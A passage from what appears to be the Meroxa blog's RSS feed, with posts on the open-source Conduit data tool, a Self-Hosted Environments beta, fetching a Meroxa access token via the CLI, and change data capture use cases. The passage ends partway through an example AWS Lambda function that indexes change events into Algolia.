&lt;li&gt;&lt;strong&gt;To control data movement with code:&lt;/strong&gt; We needed a tool driven via config files, a REST API, or gRPC. Being able to use software to manage your data movement systems enables compelling use cases.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Be Open Source&lt;/strong&gt; — Licensing should be permissive (open-source, ftw!)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the end, we couldn’t find anything that met all of these requirements, so we embarked on creating our own.&lt;/p&gt;
&lt;p&gt;From a philosophical perspective, this functionality should be made available to all developers. We should all work toward a future where moving data within production architectures doesn’t prevent data-centric features from being built. Free data integration is what’s going to get us to the next generation of software.&lt;/p&gt;
&lt;h3&gt;What can you build today?&lt;/h3&gt;
&lt;p&gt;Today, you can build pipelines that move data from:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Kafka to Postgres&lt;/li&gt;
&lt;li&gt;File to Kafka&lt;/li&gt;
&lt;li&gt;File to File&lt;/li&gt;
&lt;li&gt;PostgreSQL to PostgreSQL&lt;/li&gt;
&lt;li&gt;PostgreSQL to Amazon S3&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We only started with these data sources, but there are many more coming down the pipeline (pun intended). If you have any ideas, &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;we’d love to hear them&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, even with the connectors we have today, you can start to think about and build the following use cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sending messages to and from Kafka to other data stores.&lt;/li&gt;
&lt;li&gt;Storing changes of your PostgreSQL replication log in Amazon S3 for auditing.&lt;/li&gt;
&lt;li&gt;Streaming logs to Kafka.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We are already using this behind the scenes at Meroxa. If you create a pipeline with Meroxa, it’s using Conduit.&lt;/p&gt;
&lt;h3&gt;What’s Next&lt;/h3&gt;
&lt;p&gt;We are &lt;a href=&quot;https://github.com/ConduitIO/conduit/projects/1&quot;&gt;building Conduit out in the open&lt;/a&gt;. It’s an ambitious project, but we think we have something pretty cool. I hope you &lt;a href=&quot;https://www.conduit.io/&quot;&gt;check it out&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here are your next steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Chat with the Conduit team in the &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord Community&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Request features or ask questions about Conduit in &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Send bug reports to &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues&quot;&gt;GitHub Issues&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Check out the &lt;a href=&quot;https://conduit-site.vercel.app/&quot;&gt;Conduit Documentation&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Show us love on &lt;a href=&quot;https://twitter.com/ConduitIO&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Introducing Self-Hosted Environments: Bringing Data Isolation to Your Cloud]]></title><description><![CDATA[Today, we’re excited to announce the Self-Hosted Environments Beta.]]></description><link>https://meroxa.com/blog/introducing-self-hosted-environments-bringing-data-isolation-to-your-cloud</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-self-hosted-environments-bringing-data-isolation-to-your-cloud</guid><dc:creator><![CDATA[Sara Menefee]]></dc:creator><pubDate>Tue, 04 Jan 2022 16:34:00 GMT</pubDate><content:encoded>&lt;p&gt;Today, we’re excited to announce the&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;Self-Hosted Environments Beta&lt;/a&gt;. We’ve learned from our customers that with the need for data security and compliance on the rise, building and maintaining environments and dependencies to support their existing DevOps processes and workflows is a non-trivial matter.&lt;/p&gt;
&lt;p&gt;Currently, engineering teams must choose between speed and compliance. When building or modifying data infrastructure, this can mean lost time or potentially putting sensitive data at risk.&lt;/p&gt;
&lt;p&gt;Self-Hosted Environments can now be provisioned with Meroxa in an existing cloud provider with just a few steps. Environments play a key role by encapsulating settings in an isolated subnet where data application resources can exist and operate securely. By sequestering development and testing efforts in environments as part of the DevOps lifecycle, engineers mitigate impact risk on existing systems and customers.&lt;/p&gt;
&lt;p&gt;We’ve done the work to eliminate implementation complexity for our customers while still offering complete operational control over their data security, compliance, and performance needs.&lt;/p&gt;
&lt;h3&gt;Getting started&lt;/h3&gt;
&lt;p&gt;To get started, &lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;sign up for the Self-Hosted Environments Beta&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;A member of our team will reach out with the next steps. You will need access to your cloud provider to generate credentials with the necessary permissions to provision an environment.&lt;/p&gt;
&lt;p&gt;In the meantime, &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;request a demo of Meroxa&lt;/a&gt; to gain access to a Meroxa account.&lt;/p&gt;
&lt;p&gt;With Self-Hosted Environments, you get all the power and utility of the Meroxa Platform, allowing easy creation and management of Resources, Connectors, and Pipelines through our Dashboard or CLI — all with your data securely isolated in your cloud.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*yoV-lAspmvCOrBStrhTJUA@2x.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The Meroxa Platform performs a preflight check to verify permissions before generating a new VPC and the associated dependencies in your cloud. A secure remote connection will be maintained automatically with the Meroxa Platform for the control plane to ensure everything operates smoothly.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*iNTaOvc5RH1bt0tAt-j1lA.png&quot; alt=&quot;&quot;&gt;To provision your Self-Hosted Environment, you will need credentials from your cloud provider with the appropriate permissions.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*8vu0fyEpXIN3xqmWab71BQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Creating Self-Hosted Environments is made easy through our &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/&quot;&gt;CLI&lt;/a&gt;. Simply name the environment, indicate the type and provider, and include the configuration that contains your cloud provider credentials. See our &lt;a href=&quot;https://docs.meroxa.com/platform/environments/overview&quot;&gt;documentation&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;p&gt;Once successfully provisioned, you are ready to start creating Resources, Pipelines, and Connectors to move your data within your Self-Hosted Environment.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*pGDwtWWQDOANkrO8UCGsDw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the dashboard, you have the option to indicate which environment you’d like to create a Resource or Pipeline for by selecting the environment in the dropdown. The default environment is ‘common’.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*GnT7uXoGBvvAk88-lPhi2Q.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;When using the CLI, you can indicate in which environment you’d like to create your Resources or Pipelines by passing the `env` flag, followed by the environment name, in the CLI command.&lt;/p&gt;
&lt;h3&gt;What’s supported&lt;/h3&gt;
&lt;p&gt;Self-Hosted Environments may be provisioned in the following Amazon Web Services (AWS) regions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;us-east-1&lt;/code&gt; (N. Virginia)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;us-east-2&lt;/code&gt; (Ohio)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;us-west-2&lt;/code&gt; (Oregon)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;ap-northeast-1&lt;/code&gt; (Tokyo)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;eu-central-1&lt;/code&gt; (Frankfurt)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We do not currently support the provisioning of environments within existing VPCs.&lt;/p&gt;
&lt;p&gt;Don’t see your cloud provider or preferred region? You can still &lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;sign up for the beta&lt;/a&gt; — we’d love to hear how we might best support your needs!&lt;/p&gt;
&lt;h3&gt;Learn more&lt;/h3&gt;
&lt;p&gt;Are you as excited about real-time data applications as we are? We’d love for you to take Self-Hosted Environments for a spin. &lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;Sign up for the beta&lt;/a&gt; today — we will be in touch with the next steps! For more details, see our &lt;a href=&quot;https://docs.meroxa.com/platform/environments/overview&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme&quot;&gt;Sign up for the Self-Hosted Environments Beta&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You can reach us directly at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[How to Obtain a Meroxa Access Token]]></title><description><![CDATA[Step-by-step instructions on how to obtain a Meroxa access token. The Meroxa access token is needed to authenticate to the Meroxa API programmatically.]]></description><link>https://meroxa.com/blog/how-to-obtain-a-meroxa-access-token</link><guid isPermaLink="false">https://meroxa.com/blog/how-to-obtain-a-meroxa-access-token</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Mon, 06 Sep 2021 17:02:00 GMT</pubDate><content:encoded>&lt;p&gt;The Meroxa access token is needed to authenticate to the Meroxa API programmatically. For example, the token allows you to build pipelines with&lt;a href=&quot;https://docs.meroxa.com/platform/terraform&quot;&gt;Terraform&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To obtain a token, you must install the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;. Then, follow these steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Log in to the CLI.&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa login&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Get token.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The &lt;a href=&quot;https://docs.meroxa.com/changelog/2021-08-24-meroxa-cli-v-1-1-0&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;meroxa config&lt;/code&gt;&lt;/a&gt; command allows you to access details about your Meroxa environment.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/meroxa-config-e9e9504392621b4ea00d83b694ed8837.png&quot; alt=&quot;Meroxa Config Command&quot;&gt;&lt;/p&gt;
&lt;p&gt;For security, the output is obfuscated unless you use the &lt;code class=&quot;language-text&quot;&gt;--json&lt;/code&gt; flag:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa config &lt;span class=&quot;token parameter variable&quot;&gt;--json&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Other Methods&lt;a href=&quot;https://docs.meroxa.com/guides/how-to-obtain-meroxa-access-token#other-methods&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;If you&apos;re familiar with &lt;a href=&quot;https://stedolan.github.io/jq/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;jq&lt;/code&gt;&lt;/a&gt;, you can parse the JSON output and print only the Meroxa token in one command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa config &lt;span class=&quot;token parameter variable&quot;&gt;--json&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; jq &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; .config.access_token&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You could also add this to your &lt;code class=&quot;language-text&quot;&gt;.zshrc&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;.profile&lt;/code&gt; to always have it available in your environment.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;export&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;MEROXA_ACCESS_TOKEN&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;$(&lt;/span&gt;meroxa config &lt;span class=&quot;token parameter variable&quot;&gt;--json&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; jq &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; .config.access_token&lt;span class=&quot;token variable&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded></item><item><title><![CDATA[Stream Your Database Changes with Change Data Capture: Part Two]]></title><description><![CDATA[Let’s discuss the use cases of CDC and look at the tools that help you add CDC into your architecture.]]></description><link>https://meroxa.com/blog/stream-your-database-changes-with-change-data-capture-part-two</link><guid isPermaLink="false">https://meroxa.com/blog/stream-your-database-changes-with-change-data-capture-part-two</guid><dc:creator><![CDATA[Taron Foxworth]]></dc:creator><pubDate>Wed, 01 Sep 2021 20:11:00 GMT</pubDate><content:encoded>&lt;p&gt;This is part two of a series on Change Data Capture (CDC). In part one, &lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-one&quot;&gt;we defined change data capture, explored how data is captured, and weighed the pros and cons of each capturing method&lt;/a&gt;.
In this article, let’s discuss the use cases of CDC and look at the tools that help you add CDC into your architecture.&lt;/p&gt;
&lt;p&gt;Change Data Capture helps enable &lt;a href=&quot;https://engineering.linkedin.com/distributed-systems/log-what-every-software-engineer-should-know-about-real-time-datas-unifying&quot;&gt;event-driven applications&lt;/a&gt;. It allows applications to listen for changes to a database, data warehouse, etc., and act upon those changes.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*JbVsh5uBanFyqEWYH8fxXw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
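&lt;p&gt;Most CDC tools deliver each change as a structured event. As a rough illustration, here is a simplified, Debezium-style change event; the field names follow Debezium&apos;s convention (before, after, source, op), but the exact shape varies by tool, and the values here are made up:&lt;/p&gt;

```javascript
// A simplified, Debezium-style change event (illustrative values only).
// Real events also include a schema section and richer source metadata.
const changeEvent = {
  payload: {
    before: null,                                // row state before the change (null for inserts)
    after: { id: 42, email: "fan@example.com" }, // row state after the change
    source: { db: "shop", table: "users" },      // where the change originated
    op: "c",                                     // c = create, u = update, d = delete, r = read/snapshot
    ts_ms: 1630000000000,                        // when the change was captured
  },
};

// Consumers typically destructure the payload and branch on `op`:
const { before, after, op } = changeEvent.payload;
console.log(op, after.id);
```

&lt;p&gt;Every use case below boils down to consuming events of this general shape and reacting to them.&lt;/p&gt;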
&lt;p&gt;At a high level, here are the use cases and architectures that arise from acting on data changes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Extract, Transform, Load (ETL):&lt;/strong&gt; Capturing every change of one datastore and applying these changes to another allows for replication (one-time sync) and mirroring (continuous syncing).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integration and Automation:&lt;/strong&gt; The action taken on data change events can automate tasks, trigger workflows, or even execute cloud functions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;History:&lt;/strong&gt; When performing historical analysis on a dataset, having the current state of the data and all past changes gives you complete information for a higher fidelity analysis.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Alerting:&lt;/strong&gt; Most of the time, applications send an event to a user whenever the data they care about changes. CDC can be the trigger for real-time alerting systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s explore.&lt;/p&gt;
&lt;h3&gt;Extract, Transform, Load&lt;/h3&gt;
&lt;p&gt;To date, one of the most common use cases for CDC is Extract, Transform, Load (ETL). ETL is a process in which you capture data from one source (extract), process it in some way (transform), and send it to a destination (load).&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*m-ABnhybW0FaefsjpVWYbg.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Data replication (one-time sync) and mirroring (continuous replication) are great examples of ETL processes. ETL is an umbrella term that encompasses very different use cases such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ingesting data from a database into a data warehouse to run analytic queries without impacting production.&lt;/li&gt;
&lt;li&gt;Keeping caches and search index systems up-to-date.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Not only can CDC help solve these use cases, but it’s also the best way to solve these problems. For example, to mirror data to a data warehouse, you must capture and apply any &lt;em&gt;changes&lt;/em&gt; as they happen to the source database. As discussed with &lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-one&quot;&gt;Streaming Replication Logs&lt;/a&gt; in part one of the series, CDC is used by databases to keep standby instances up-to-date for failover because it’s effective and scalable. When tapping into these events in a wider architecture, your data warehouse can be as up-to-date as a standby database instance used for disaster recovery.&lt;/p&gt;
&lt;p&gt;Keeping &lt;a href=&quot;https://en.wikipedia.org/wiki/Cache_(computing)&quot;&gt;caches&lt;/a&gt; and search index systems up-to-date is also an ETL problem and a great CDC use case. Large applications created today are composed of many different data stores. For example, certain architectures will leverage Postgres, Redis, and Elasticsearch as a relational database, caching layer, and search engine, respectively. Each system is designed for a specific data use case, but the same data needs to be mirrored in each store.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*Xt0ux3ZyEjSi65HzodLkNQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;You never want a user to search for a product and then find out it no longer exists. Stale caches and search indexes lead to horrible user experiences. CDC can be used to build data pipelines that keep these stores in sync with their upstream dependencies.&lt;/p&gt;
&lt;p&gt;In theory, a single application could write to Postgres, Redis, and Elasticsearch simultaneously, but “Dual Writes” can be tough to manage and can lead to out-of-sync systems. CDC offers a stronger, easier-to-maintain implementation. Instead of adding the logic to update indexes and caches to a single monolithic application, one could create an event-driven microservice that can be built, maintained, improved, and deployed independently from user-facing systems. This microservice can keep indexes and caches up to date to ensure users operate on the most relevant data.&lt;/p&gt;
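&lt;p&gt;As a rough sketch of that microservice, the following consumer applies each change event to every downstream store in one place. The in-memory maps are hypothetical stand-ins for real Redis and Elasticsearch clients, and the event shape is assumed to carry before/after/op fields:&lt;/p&gt;

```javascript
// Sketch of an event-driven sync service: one consumer applies each change
// to every downstream store, instead of the app dual-writing to all of them.
// `cache` and `searchIndex` are stand-ins for Redis/Elasticsearch clients.
const cache = new Map();
const searchIndex = new Map();

function applyChange(event) {
  const { before, after, op } = event.payload;
  if (op === "c" || op === "u" || op === "r") {
    cache.set(after.id, after);        // refresh the cache entry
    searchIndex.set(after.id, after);  // reindex the document
  } else if (op === "d") {
    cache.delete(before.id);           // evict the stale cache entry
    searchIndex.delete(before.id);     // drop it from search results
  }
}

applyChange({ payload: { before: null, after: { id: 1, name: "Widget" }, op: "c" } });
applyChange({ payload: { before: { id: 1 }, after: null, op: "d" } });
console.log(cache.size, searchIndex.size); // both stores stay in sync
```

&lt;p&gt;Because the sync logic lives in one consumer, adding another downstream store means extending this service rather than touching every application that writes to the database.&lt;/p&gt;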
&lt;h3&gt;Integration and Automation&lt;/h3&gt;
&lt;p&gt;The rise of SaaS has led to an explosion in the number of tools that generate data or need to be updated with data. CDC can provide a better model for keeping Salesforce, Hubspot, etc., up to date and allow automation of business logic that needs to respond to those data changes.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*7VyCMIWSEVVLoIcgHgaJpQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Each of the use cases we described above sends data to a specific destination. However, the most powerful destination is a cloud function. Capturing data changes and triggering a cloud function can be used to implement every use case mentioned in this article (and many that aren’t).&lt;/p&gt;
&lt;p&gt;Cloud functions have grown tremendously because there are no servers to maintain; they scale automatically and are simple to use and deploy. This popularity and usefulness have been proven in architectures like the JAMStack. CDC fits perfectly with this architecture model.&lt;/p&gt;
&lt;p&gt;Today, cloud functions are triggered by an event. This event could be a &lt;a href=&quot;https://docs.aws.amazon.com/lambda/latest/dg/with-s3-example.html&quot;&gt;file being uploaded to Amazon S3&lt;/a&gt; or an HTTP request. However, as you might have guessed, this trigger event could also be emitted by a CDC system.&lt;/p&gt;
&lt;p&gt;For example, here is an AWS Lambda function that accepts a data change event and &lt;a href=&quot;https://www.algolia.com/doc/&quot;&gt;performs Algolia search indexing&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; algoliasearch &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;algoliasearch&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; client &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;algoliasearch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_APP_ID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_API_KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; index &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;initIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;ALGOLIA_INDEX_NAME&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
 
exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function-variable function&quot;&gt;handler&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;event&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; context&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;EVENT: \\n&quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;event&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; request &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; event&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Records&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;cf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;request&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
 
  &lt;span class=&quot;token comment&quot;&gt;// Accessing the Data Record&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;//  &lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; body &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Buffer&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;from&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;request&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;body&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;base64&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;toString&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payload &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;parse&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;body&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
